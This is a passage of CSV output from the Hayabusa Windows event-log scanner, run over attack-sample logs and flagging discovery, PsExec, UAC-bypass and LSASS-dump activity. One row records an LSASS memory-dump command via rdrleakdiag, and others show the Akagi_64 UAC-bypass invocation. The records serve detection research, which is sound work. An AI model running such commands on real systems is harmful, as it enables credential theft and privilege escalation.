83989F29-3374-5F6B-0100-000000000301,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx +2020-09-23 16:50:19.821 +00:00,01566s-win16-ir.threebeesco.com,1,info,,Process Created,Cmd: C:\Windows\system32\wermgr.exe -upload | Process: C:\Windows\System32\wermgr.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs | LID: 0x3e7 | PID: 4248 | PGUID: 83989F29-7CCB-5F6B-2301-000000000301,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx +2020-09-23 16:50:27.599 +00:00,01566s-win16-ir.threebeesco.com,3,info,,Network Connection,tcp | Src: 0:0:0:0:0:0:0:1:52249 (01566s-win16-ir.threebeesco.com) | Dst: 0:0:0:0:0:0:0:1:389 (01566s-win16-ir.threebeesco.com) | User: NT AUTHORITY\SYSTEM | Process: C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe | PID: 1864 | PGUID: 83989F29-3391-5F6B-1F00-000000000301,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx +2020-09-23 16:50:45.506 +00:00,01566s-win16-ir.threebeesco.com,17,medium,,Pipe Created_Sysmon Alert,PrivEsc - Rogue Spool named pipe | Pipe: \eventlog | Process: C:\Windows\System32\svchost.exe | PID: 6924 | PGUID: 83989F29-7CC9-5F6B-2201-000000000301,rules/hayabusa/sysmon/alerts/17_PipeCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx +2020-09-23 16:51:27.552 +00:00,01566s-win16-ir.threebeesco.com,3,info,,Network Connection,tcp | Src: 0:0:0:0:0:0:0:1:52264 (01566s-win16-ir.threebeesco.com) | Dst: 0:0:0:0:0:0:0:1:389 (01566s-win16-ir.threebeesco.com) | User: NT AUTHORITY\SYSTEM | Process: 
C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe | PID: 1864 | PGUID: 83989F29-3391-5F6B-1F00-000000000301,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx +2020-09-27 13:19:54.244 +00:00,MSEDGEWIN10,18,info,,Pipe Connected,\lsass | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx +2020-09-27 13:19:54.250 +00:00,MSEDGEWIN10,18,info,,Pipe Connected,\lsass | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx +2020-09-27 13:19:54.257 +00:00,MSEDGEWIN10,18,info,,Pipe Connected,\lsass | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx +2020-09-27 13:19:54.264 +00:00,MSEDGEWIN10,18,info,,Pipe Connected,\browser | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx +2020-09-27 13:19:54.272 +00:00,MSEDGEWIN10,18,info,,Pipe Connected,\atsvc | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx +2020-09-27 13:19:54.286 +00:00,MSEDGEWIN10,18,info,,Pipe Connected,\epmapper | Process: System | PID: 4 | PGUID: 
747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx +2020-09-27 13:19:54.293 +00:00,MSEDGEWIN10,18,info,,Pipe Connected,\eventlog | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx +2020-09-27 13:19:54.299 +00:00,MSEDGEWIN10,18,info,,Pipe Connected,\InitShutdown | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx +2020-09-27 13:19:54.314 +00:00,MSEDGEWIN10,18,info,,Pipe Connected,\lsass | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx +2020-09-27 13:19:54.322 +00:00,MSEDGEWIN10,18,info,,Pipe Connected,\LSM_API_service | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx +2020-09-27 13:19:54.328 +00:00,MSEDGEWIN10,18,info,,Pipe Connected,\ntsvcs | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx +2020-09-27 13:19:54.343 +00:00,MSEDGEWIN10,18,info,,Pipe Connected,\lsass | Process: System | PID: 4 | PGUID: 
747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx +2020-09-27 13:19:54.350 +00:00,MSEDGEWIN10,18,info,,Pipe Connected,\ROUTER | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx +2020-09-27 13:19:54.364 +00:00,MSEDGEWIN10,18,info,,Pipe Connected,\scerpc | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx +2020-09-27 13:19:54.371 +00:00,MSEDGEWIN10,18,info,,Pipe Connected,\srvsvc | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx +2020-09-27 13:19:54.377 +00:00,MSEDGEWIN10,18,info,,Pipe Connected,\tapsrv | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx +2020-09-27 13:19:54.385 +00:00,MSEDGEWIN10,18,info,,Pipe Connected,\trkwks | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx +2020-09-27 13:19:54.399 +00:00,MSEDGEWIN10,18,info,,Pipe Connected,\wkssvc | Process: System | PID: 4 | PGUID: 
747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx +2020-09-27 13:20:11.245 +00:00,MSEDGEWIN10,18,info,,Pipe Connected,\wkssvc | Process: C:\Windows\system32\mmc.exe | PID: 6096 | PGUID: 747F3D96-8E29-5F70-0000-001049471000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx +2020-09-27 13:20:11.247 +00:00,MSEDGEWIN10,18,info,,Pipe Connected,\browser | Process: C:\Windows\system32\mmc.exe | PID: 6096 | PGUID: 747F3D96-8E29-5F70-0000-001049471000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx +2020-09-27 13:42:00.726 +00:00,MSEDGEWIN10,17,info,,Pipe Created,\svchost | Process: C:\Windows\svchost.exe | PID: 1120 | PGUID: 747F3D96-96A8-5F70-0000-0010C0F02D00,rules/hayabusa/sysmon/events/17_PipeCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx +2020-09-27 13:42:00.969 +00:00,MSEDGEWIN10,18,info,,Pipe Connected,\svchost | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx +2020-09-27 13:42:01.092 +00:00,MSEDGEWIN10,17,info,,Pipe Created,\svchost-MSEDGEWIN10-8116-stdin | Process: C:\Windows\svchost.exe | PID: 1120 | PGUID: 747F3D96-96A8-5F70-0000-0010C0F02D00,rules/hayabusa/sysmon/events/17_PipeCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx +2020-09-27 13:42:01.093 +00:00,MSEDGEWIN10,17,info,,Pipe Created,\svchost-MSEDGEWIN10-8116-stdout | Process: C:\Windows\svchost.exe | PID: 1120 | PGUID: 
747F3D96-96A8-5F70-0000-0010C0F02D00,rules/hayabusa/sysmon/events/17_PipeCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx +2020-09-27 13:42:01.093 +00:00,MSEDGEWIN10,17,info,,Pipe Created,\svchost-MSEDGEWIN10-8116-stderr | Process: C:\Windows\svchost.exe | PID: 1120 | PGUID: 747F3D96-96A8-5F70-0000-0010C0F02D00,rules/hayabusa/sysmon/events/17_PipeCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx +2020-09-27 13:42:01.182 +00:00,MSEDGEWIN10,18,info,,Pipe Connected,\svchost-MSEDGEWIN10-8116-stdin | Process: C:\Windows\system32\PsExec.exe | PID: 8116 | PGUID: 747F3D96-96A8-5F70-0000-001028E92D00,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx +2020-09-27 13:42:01.182 +00:00,MSEDGEWIN10,18,info,,Pipe Connected,\svchost-MSEDGEWIN10-8116-stdout | Process: C:\Windows\system32\PsExec.exe | PID: 8116 | PGUID: 747F3D96-96A8-5F70-0000-001028E92D00,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx +2020-09-27 13:42:01.182 +00:00,MSEDGEWIN10,18,info,,Pipe Connected,\svchost-MSEDGEWIN10-8116-stderr | Process: C:\Windows\system32\PsExec.exe | PID: 8116 | PGUID: 747F3D96-96A8-5F70-0000-001028E92D00,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx +2020-09-27 13:42:15.033 +00:00,MSEDGEWIN10,18,info,,Pipe Connected,\lsass | Process: C:\Windows\system32\svchost.exe | PID: 1000 | PGUID: 747F3D96-96B6-5F70-0000-0010E5382E00,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx +2020-09-27 13:42:15.525 +00:00,MSEDGEWIN10,18,info,,Pipe 
Connected,\wkssvc | Process: C:\Windows\system32\mmc.exe | PID: 6096 | PGUID: 747F3D96-8E29-5F70-0000-001049471000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx +2020-09-27 13:42:15.530 +00:00,MSEDGEWIN10,18,info,,Pipe Connected,\browser | Process: C:\Windows\system32\mmc.exe | PID: 6096 | PGUID: 747F3D96-8E29-5F70-0000-001049471000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx +2020-09-28 12:47:36.197 +00:00,DESKTOP-PIU87N6,1,info,,Process Created,"Cmd: rdrleakdiag.exe /p 668 /o C:\Users\wanwan\Desktop /fullmemdmp /snap | Process: C:\Windows\System32\rdrleakdiag.exe | User: DESKTOP-PIU87N6\wanwan | Parent Cmd: ""C:\WINDOWS\system32\cmd.exe"" | LID: 0x30b90 | PID: 3352 | PGUID: BC47D85C-DB68-5F71-0000-0010B237AB01",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx +2020-09-28 12:47:36.197 +00:00,DESKTOP-PIU87N6,1,high,Evas,RdrLeakDiag Process Dump,,rules/sigma/process_creation_sysmon/proc_creation_win_proc_dump_rdrleakdiag.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx +2020-09-28 12:47:36.197 +00:00,DESKTOP-PIU87N6,1,high,CredAccess,Process Dump via RdrLeakDiag.exe,,rules/sigma/process_creation_sysmon/proc_creation_win_process_dump_rdrleakdiag.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx +2020-09-28 12:47:36.206 +00:00,DESKTOP-PIU87N6,8,medium,,Process Injection,Src Process: C:\Windows\System32\rdrleakdiag.exe | Tgt Process: C:\Windows\System32\lsass.exe | Src PID: 3352 | Src PGUID: BC47D85C-DB68-5F71-0000-0010B237AB01 | Tgt PID: 668 | Tgt PGUID: 
BC47D85C-FAA9-5F68-0000-0010D9590000,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx +2020-09-28 12:47:36.215 +00:00,DESKTOP-PIU87N6,1,info,,Process Created,Cmd: C:\WINDOWS\system32\lsass.exe | Process: C:\Windows\System32\lsass.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\WINDOWS\system32\lsass.exe | LID: 0x3e7 | PID: 7468 | PGUID: BC47D85C-DB68-5F71-0000-00109138AB01,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx +2020-09-28 12:47:36.215 +00:00,DESKTOP-PIU87N6,1,critical,CredAccess,Suspicious LSASS Process Clone,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_lsass_clone.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx +2020-09-28 12:47:36.630 +00:00,DESKTOP-PIU87N6,11,info,,File Created,Path: C:\Users\wanwan\Desktop\minidump_668.dmp | Process: C:\WINDOWS\system32\rdrleakdiag.exe | PID: 3352 | PGUID: BC47D85C-DB68-5F71-0000-0010B237AB01,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx +2020-10-01 18:35:02.415 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: POC.exe | Process: C:\Users\Public\POC\bin\Debug\POC.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x5a873 | PID: 4696 | PGUID: 747F3D96-2156-5F76-0000-0010DBE82500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx +2020-10-01 18:35:02.415 +00:00,MSEDGEWIN10,1,high,,Suspicious Program Names,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_progname.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx +2020-10-01 18:35:02.415 
+00:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx +2020-10-01 18:35:02.606 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: Program | Process: C:\Users\Public\POC\bin\Debug\POC.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: POC.exe | LID: 0x5a873 | PID: 5448 | PGUID: 747F3D96-2156-5F76-0000-00100EEC2500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx +2020-10-01 18:35:02.606 +00:00,MSEDGEWIN10,1,high,,Suspicious Program Names,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_progname.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx +2020-10-01 18:35:02.606 +00:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx +2020-10-01 18:35:02.775 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Microsoft\abc.txt | Process: C:\Windows\System32\RuntimeBroker.exe | PID: 6932 | PGUID: 747F3D96-1903-5F76-0000-0010B85E0900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx +2020-10-05 20:43:58.351 +00:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\Users\bouss\Downloads\UACME-3.2.6\Source\Akagi\output\x64\Debug\Akagi_64.exe | Tgt Process: C:\Windows\System32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 27356 | Src PGUID: 00247C92-858E-5F7B-0000-00106B29202B | Tgt PID: 19072 | Tgt PGUID: 
00247C92-82A5-5F7B-0000-0010C89F0A2B,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx +2020-10-05 20:43:58.351 +00:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\Users\bouss\Downloads\UACME-3.2.6\Source\Akagi\output\x64\Debug\Akagi_64.exe | Tgt Process: C:\Windows\System32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 27356 | Src PGUID: 00247C92-858E-5F7B-0000-00106B29202B | Tgt PID: 19072 | Tgt PGUID: 00247C92-82A5-5F7B-0000-0010C89F0A2B,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx +2020-10-05 20:43:58.390 +00:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\system32\svchost.exe | Tgt Process: C:\windows\explorer.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1014c0 | Src PID: 11640 | Src PGUID: 00247C92-5B27-5F74-0000-001045F11200 | Tgt PID: 27356 | Tgt PGUID: 00247C92-858E-5F7B-0000-00106B29202B,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx +2020-10-05 20:43:58.390 +00:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\system32\svchost.exe | Tgt Process: C:\windows\explorer.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1014c0 | Src PID: 11640 | Src PGUID: 00247C92-5B27-5F74-0000-001045F11200 | Tgt PID: 27356 | Tgt PGUID: 00247C92-858E-5F7B-0000-00106B29202B,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx +2020-10-05 20:43:58.394 +00:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\system32\svchost.exe | Tgt Process: C:\windows\explorer.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1014c0 | Src PID: 11640 | Src PGUID: 00247C92-5B27-5F74-0000-001045F11200 | Tgt PID: 27356 | Tgt PGUID: 
00247C92-858E-5F7B-0000-00106B29202B,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx +2020-10-05 20:43:58.394 +00:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\system32\svchost.exe | Tgt Process: C:\windows\explorer.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1014c0 | Src PID: 11640 | Src PGUID: 00247C92-5B27-5F74-0000-001045F11200 | Tgt PID: 27356 | Tgt PGUID: 00247C92-858E-5F7B-0000-00106B29202B,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx +2020-10-05 20:43:58.450 +00:00,LAPTOP-JU4M3I0E,1,info,,Process Created,Cmd: C:\windows\system32\taskmgr.exe | Process: C:\Windows\System32\Taskmgr.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: Akagi_64.exe 59 cmd.exe | LID: 0x391e334 | PID: 18404 | PGUID: 00247C92-858E-5F7B-0000-00105241202B,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx +2020-10-05 20:43:58.450 +00:00,LAPTOP-JU4M3I0E,1,info,,Process Created,Cmd: C:\windows\system32\taskmgr.exe | Process: C:\Windows\System32\Taskmgr.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: Akagi_64.exe 59 cmd.exe | LID: 0x391e334 | PID: 18404 | PGUID: 00247C92-858E-5F7B-0000-00105241202B,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx +2020-10-05 20:43:58.450 +00:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\system32\svchost.exe | Tgt Process: C:\windows\system32\taskmgr.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 11640 | Src PGUID: 00247C92-5B27-5F74-0000-001045F11200 | Tgt PID: 18404 | Tgt PGUID: 00247C92-858E-5F7B-0000-00105241202B,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx +2020-10-05 20:43:58.450 
+00:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\system32\svchost.exe | Tgt Process: C:\windows\system32\taskmgr.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 11640 | Src PGUID: 00247C92-5B27-5F74-0000-001045F11200 | Tgt PID: 18404 | Tgt PGUID: 00247C92-858E-5F7B-0000-00105241202B,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx +2020-10-05 20:43:58.450 +00:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\explorer.exe | Tgt Process: C:\windows\system32\taskmgr.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x12367b | Src PID: 27356 | Src PGUID: 00247C92-858E-5F7B-0000-00106B29202B | Tgt PID: 18404 | Tgt PGUID: 00247C92-858E-5F7B-0000-00105241202B,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx +2020-10-05 20:43:58.450 +00:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\explorer.exe | Tgt Process: C:\windows\system32\taskmgr.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x12367b | Src PID: 27356 | Src PGUID: 00247C92-858E-5F7B-0000-00106B29202B | Tgt PID: 18404 | Tgt PGUID: 00247C92-858E-5F7B-0000-00105241202B,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx +2020-10-05 20:43:58.451 +00:00,LAPTOP-JU4M3I0E,1,info,,Process Created,Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: C:\windows\system32\taskmgr.exe | LID: 0x391e334 | PID: 6636 | PGUID: 00247C92-858E-5F7B-0000-0010E741202B,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx +2020-10-05 20:43:58.451 +00:00,LAPTOP-JU4M3I0E,1,low,Evas,Taskmgr as 
Parent,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_taskmgr_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx +2020-10-05 20:43:58.451 +00:00,LAPTOP-JU4M3I0E,1,info,,Process Created,Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: C:\windows\system32\taskmgr.exe | LID: 0x391e334 | PID: 6636 | PGUID: 00247C92-858E-5F7B-0000-0010E741202B,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx +2020-10-05 20:43:58.451 +00:00,LAPTOP-JU4M3I0E,1,low,Evas,Taskmgr as Parent,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_taskmgr_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx +2020-10-05 22:28:20.530 +00:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: ""C:\Windows\System32\mmc.exe"" WF.msc | LID: 0x391e334 | PID: 12876 | PGUID: 